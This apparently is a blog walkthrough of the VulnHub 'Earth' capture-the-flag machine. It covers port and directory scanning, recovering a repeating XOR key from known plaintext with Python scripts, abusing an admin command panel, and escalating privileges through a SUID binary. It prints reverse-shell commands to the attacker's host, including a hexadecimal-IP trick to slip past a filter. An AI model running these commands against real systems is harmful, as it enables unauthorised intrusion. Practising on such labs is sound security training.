vulnhub THE PLANETS: EARTH Penetration Notes

Target machine download address: https://www.vulnhub.com/entry/the-planets-earth,755/#download

Check the Kali IP address

Information gathering: discover live hosts on the subnet
nmap -sP 192.168.20.0/24

Determine the ip address of the target machine

Scan for open ports

nmap -A -p 1-65535 192.168.20.131  

The full port scan takes a while. In the results we find that the HTTPS service on port 443 references hostnames (earth.local and terratest.earth.local), so we add them to the hosts file.

Collect earth.local information

Find Previous Messages at the bottom of the page

    3714171e0b0a550a1859101d064b160a191a4b0908140d0e0d441c0d4b1611074318160814114b0a1d06170e1444010b0a0d441c104b150106104b1d011b100e59101d0205591314170e0b4a552a1f59071a16071d44130f041810550a05590555010a0d0c011609590d13430a171d170c0f0044160c1e150055011e100811430a59061417030d1117430910035506051611120b45

scan the directory

dirb https://earth.local/

Found the admin directory, let's visit it

is a login screen

Collect terratest.earth.local information

Also let's scan the directory

dirb https://terratest.earth.local/

Found robots.txt let's visit

I don't know what the file format of the last entry is, so I try adding .txt to access it

Once accessed, the file reads roughly as follows (translated):

Considerations for testing a secure messaging system:
* Using XOR encryption as the algorithm; it should be as safe to use as RSA.
* Earth has confirmed that they have received our message.
* testdata.txt is used for testing the encryption.
* terra is the username to use for the admin portal.
To do:
* How do we securely send monthly keys to Earth? Or should we change keys every week?
* Different key lengths need to be tested to prevent brute force attacks. How long should the keys be?
* The interface for the messaging interface and admin panel needs to be improved; currently it is very basic.

This gives us three pieces of information: the encryption algorithm is XOR, testdata.txt is the plaintext used to test the encryption, and the admin username is terra. Open testdata.txt and save its contents:

According to radiometric dating estimation and other evidence, Earth formed over 4.5 billion years ago. Within the first billion years of Earth's history, life appeared in the oceans and began to affect Earth's atmosphere and surface, leading to the proliferation of anaerobic and, later, aerobic organisms. Some geological evidence indicates that life may have arisen as early as 4.1 billion years ago.

The general idea for decryption is as follows:

  • terra is the administrator username
  • The messages are encrypted with an XOR (exclusive OR) operation
  • Since XOR is its own inverse, XORing one of the Previous Messages on the home page with the known plaintext testdata.txt recovers the key
Exploitation (I don't know much about encryption and decryption, so please don't flame me)

Write a script that takes one of the Previous Messages and XORs it with testdata.txt to recover the key

import binascii

# Paste the hex string of one Previous Message from the earth.local home page here
c = "PREVIOUS_MESSAGE_HEX"  # placeholder: the value used in the original notes was not preserved

# Contents of testdata.txt, the known plaintext
m = "According to radiometric dating estimation and other evidence, Earth formed over 4.5 billion years ago. Within the first billion years of Earth's history, life appeared in the oceans and began to affect Earth's atmosphere and surface, leading to the proliferation of anaerobic and, later, aerobic organisms. Some geological evidence indicates that life may have arisen as early as 4.1 billion years ago."

# binascii.a2b_hex converts the hex string into raw bytes; the plaintext is encoded as UTF-8
c_bytes = binascii.a2b_hex(c)
m_bytes = m.encode("utf-8")

# XOR ciphertext and plaintext byte by byte, aligned from the start, to recover the key stream
key = bytes(a ^ b for a, b in zip(c_bytes, m_bytes))

print(key.hex())                               # key stream as hex
print(key.decode("utf-8", errors="replace"))   # key stream as text

Run the script to get the result

Decode the hex output as text

The decoded key stream is the password earthclimatechangebad4humans repeated over and over (the key is reused for the whole message). Now log in: the username is terra, the password is earthclimatechangebad4humans, and the login address is https://earth.local/admin
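The known-plaintext recovery described above, written out as an added example that is not part of the original notes: it recovers the key stream from a ciphertext and its plaintext, then finds the shortest repeating period, which is the actual key. The ciphertext is constructed here by encrypting the page's testdata.txt text with the page's key so the script runs offline; on the box you would paste a Previous Message hex string instead.

```python
# Added example: known-plaintext attack on repeating-key XOR (the earth.local scheme).
TESTDATA = ("According to radiometric dating estimation and other evidence, Earth formed "
            "over 4.5 billion years ago. Within the first billion years of Earth's history, "
            "life appeared in the oceans and began to affect Earth's atmosphere and surface, "
            "leading to the proliferation of anaerobic and, later, aerobic organisms. Some "
            "geological evidence indicates that life may have arisen as early as 4.1 billion years ago.")


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """XOR data with key, repeating the key as often as needed (encrypt and decrypt are the same)."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def recover_keystream(ciphertext_hex: str, known_plaintext: str) -> bytes:
    """Ciphertext XOR known plaintext gives back the key stream, byte for byte."""
    c = bytes.fromhex(ciphertext_hex)
    m = known_plaintext.encode("utf-8")
    return bytes(a ^ b for a, b in zip(c, m))


def shortest_period(stream: bytes) -> bytes:
    """Return the shortest prefix that, repeated, reproduces the whole key stream."""
    for n in range(1, len(stream) + 1):
        if all(stream[i] == stream[i % n] for i in range(len(stream))):
            return stream[:n]
    return stream


KEY = b"earthclimatechangebad4humans"  # the password found in the write-up
# Constructed ciphertext: what the Previous Messages box would show for testdata.txt
CIPHERTEXT_HEX = xor_bytes(TESTDATA.encode("utf-8"), KEY).hex()


def recover_key(ciphertext_hex: str = CIPHERTEXT_HEX, plaintext: str = TESTDATA) -> str:
    """Full attack: key stream from known plaintext, then collapse it to the repeating key."""
    return shortest_period(recover_keystream(ciphertext_hex, plaintext)).decode("utf-8")


if __name__ == "__main__":
    print(recover_key())  # prints earthclimatechangebad4humans
```

Because the same key is reused for every message, the recovered key decrypts any other message encrypted the same way with xor_bytes.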

After logging in we find that the admin panel lets us run system commands

Use find to locate the flag

find / -name "*flag*"

I found a flag.txt here, let's check it out

Get a reverse shell from the target machine

bash -i >& /dev/tcp/192.168.20.130/1234 0>&1

The panel rejects this with a message that remote connections are forbidden, so try writing the IP address in hexadecimal

bash -i >& /dev/tcp/0xc0.0xa8.0x14.0x82/1234 0>&1

Before running the command, start a listener on port 1234 on Kali

The reverse shell is successful

Privilege escalation

Look for SUID binaries

find / -perm -u=s -type f 2>/dev/null

Run reset_root:

It exits with an error saying the reset trigger failed

There is no debugger on the target, so transfer the binary to Kali with nc and debug it there

Use strace to trace its system calls

The trace shows the binary checking for three files that do not exist on the target (the calls fail with no such file), so create those three files on the target machine

Then run reset_root again

Finish

Tags: Linux Web Security network System Safety

Posted by TreeNode on Fri, 31 Mar 2023 22:12:11 +0530